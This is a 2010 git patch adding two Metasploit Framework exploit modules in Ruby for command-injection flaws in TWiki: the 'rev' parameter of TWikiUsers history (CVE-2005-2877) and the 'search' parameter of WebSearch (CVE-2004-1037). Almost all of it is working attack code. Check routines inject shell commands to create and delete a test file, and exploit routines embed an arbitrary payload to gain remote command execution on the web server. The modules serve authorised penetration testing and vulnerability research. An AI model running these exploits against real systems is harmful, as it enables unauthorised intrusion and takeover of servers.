From 6414821ea860c6f33d9129d9af0e9648be5972a9 Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Sun, 21 Feb 2010 20:31:09 +0000 Subject: [PATCH] add exploit modules for CVEs 2005-2877 and 2004-1037 git-svn-id: file:///home/svn/framework3/trunk@8578 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/unix/webapp/twiki_history.rb | 135 ++++++++++++++++++ modules/exploits/unix/webapp/twiki_search.rb | 131 +++++++++++++++++ 2 files changed, 266 insertions(+) create mode 100644 modules/exploits/unix/webapp/twiki_history.rb create mode 100644 modules/exploits/unix/webapp/twiki_search.rb diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb new file mode 100644 index 0000000000..cf3ba94039 --- /dev/null +++ b/modules/exploits/unix/webapp/twiki_history.rb @@ -0,0 +1,135 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'TWiki History TWikiUsers rev Parameter Command Execution', + 'Description' => %q{ + This module exploits a vulnerability in the history component of TWiki. + By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers + script, an attacker can execute arbitrary OS commands. + }, + 'Author' => + [ + 'B4dP4nd4', # original discovery + 'jduck' # metasploit version + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2005-2877' ], + [ 'OSVDB', '19403' ], + [ 'BID', '14384' ], + [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev' ] + ], + 'Privileged' => true, # web server context + 'Payload' => + { + 'DisableNops' => true, + 'BadChars' => '', + 'Space' => 1024, + }, + 'Platform' => [ 'unix' ], + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Sep 14 2005', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]), + ], self.class) + end + + + # + # NOTE: This is not perfect, since it requires write access to the bin + # directory. Unfortunately, detrmining the main directory isn't + # trivial, or otherwise I would write there (required to be writable + # per installation steps). + # + def check + test_file = rand_text_alphanumeric(8+rand(8)) + cmd_base = datastore['URI'] + '/view/Main/TWikiUsers?rev=' + test_url = datastore['URI'] + '/' + test_file + + # first see if it already exists (it really shouldn't) + res = send_request_raw({ + 'uri' => test_url + }, 25) + if (not res) or (res.code != 404) + print_error("WARNING: The test file exists already!") + return Exploit::CheckCode::Safe + end + + # try to create it + print_status("Attempting to create #{test_url} ...") + rev = rand_text_numeric(1+rand(5)) + ' `touch ' + test_file + '`#' + res = send_request_raw({ + 'uri' => cmd_base + Rex::Text.uri_encode(rev) + }, 25) + if (not res) or (res.code != 200) + return Exploit::CheckCode::Safe + end + + # try to run it, 500 code == successfully made it + res = send_request_raw({ + 'uri' => test_url + }, 25) + if (not res) or (res.code != 500) + return Exploit::CheckCode::Safe + end + + # delete the tmp file + print_status("Attempting to delete #{test_url} ...") + rev = rand_text_numeric(1+rand(5)) + ' `rm -f ' + test_file + '`#' + res = send_request_raw({ + 'uri' => cmd_base + Rex::Text.uri_encode(rev) + }, 25) + if (not res) or (res.code != 200) + print_error("WARNING: unable to remove test file (#{test_file})") + end + + return Exploit::CheckCode::Vulnerable + end + + + def exploit + + rev = rand_text_numeric(1+rand(5)) + rev << ' `' + payload.encoded + '`#' + query_str = datastore['URI'] + '/view/Main/TWikiUsers' + query_str << '?rev=' + query_str << Rex::Text.uri_encode(rev) + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => query_str, + }, 25) + + if (res and res.code == 200) + print_status("Successfully sent exploit request") + else + raise RuntimeError, "Error sending exploit request" + end + + handler + end + +end diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb new file mode 100644 index 0000000000..303bccec6f --- /dev/null +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -0,0 +1,131 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'TWiki Search Function Arbitrary Command Execution', + 'Description' => %q{ + This module exploits a vulnerability in the search component of TWiki. + By passing a 'search' parameter containing shell metacharacters to the + 'WebSearch' script, an attacker can execute arbitrary OS commands. + }, + 'Author' => + [ + # Unknown - original discovery + 'jduck' # metasploit version + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2004-1037' ], + [ 'OSVDB', '11714' ], + [ 'BID', '11674' ], + [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch' ] + ], + 'Privileged' => true, # web server context + 'Payload' => + { + 'DisableNops' => true, + 'BadChars' => ' ', + 'Space' => 1024, + }, + 'Platform' => [ 'unix' ], + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Oct 01 2004', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]), + ], self.class) + end + + + def check + content = rand_text_alphanumeric(16+rand(16)) + test_file = rand_text_alphanumeric(8+rand(8)) + cmd_base = datastore['URI'] + '/view/Main/WebSearch?search=' + test_url = datastore['URI'] + '/view/Main/' + test_file + + # first see if it already exists (it really shouldn't) + res = send_request_raw({ + 'uri' => test_url + }, 25) + if (not res) or (res.body.match(content)) + print_error("WARNING: The test file exists already!") + return Exploit::CheckCode::Safe + end + + # try to create it + print_status("Attempting to create #{test_url} ...") + search = rand_text_numeric(1+rand(5)) + "\';echo${IFS}" + content + "${IFS}>" + test_file + ".txt;#\'" + res = send_request_raw({ + 'uri' => cmd_base + Rex::Text.uri_encode(search) + }, 25) + if (not res) or (res.code != 200) + return Exploit::CheckCode::Safe + end + + # try to run it, 500 code == successfully made it + res = send_request_raw({ + 'uri' => test_url + }, 25) + if (not res) or (not res.body.match(content)) + return Exploit::CheckCode::Safe + end + + # delete the tmp file + print_status("Attempting to delete #{test_url} ...") + search = rand_text_numeric(1+rand(5)) + "\';rm${IFS}-f${IFS}" + test_file + ".txt;#\'" + res = send_request_raw({ + 'uri' => cmd_base + Rex::Text.uri_encode(search) + }, 25) + if (not res) or (res.code != 200) + print_error("WARNING: unable to remove test file (#{test_file})") + end + + return Exploit::CheckCode::Vulnerable + end + + + def exploit + + search = rand_text_alphanumeric(1+rand(8)) + search << "';" + payload.encoded + ";#\'" + + query_str = datastore['URI'] + '/view/Main/WebSearch' + query_str << '?search=' + query_str << Rex::Text.uri_encode(search) + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => query_str, + }, 25) + + if (res and res.code == 200) + print_status("Successfully sent exploit request") + else + raise RuntimeError, "Error sending exploit request" + end + + handler + end + +end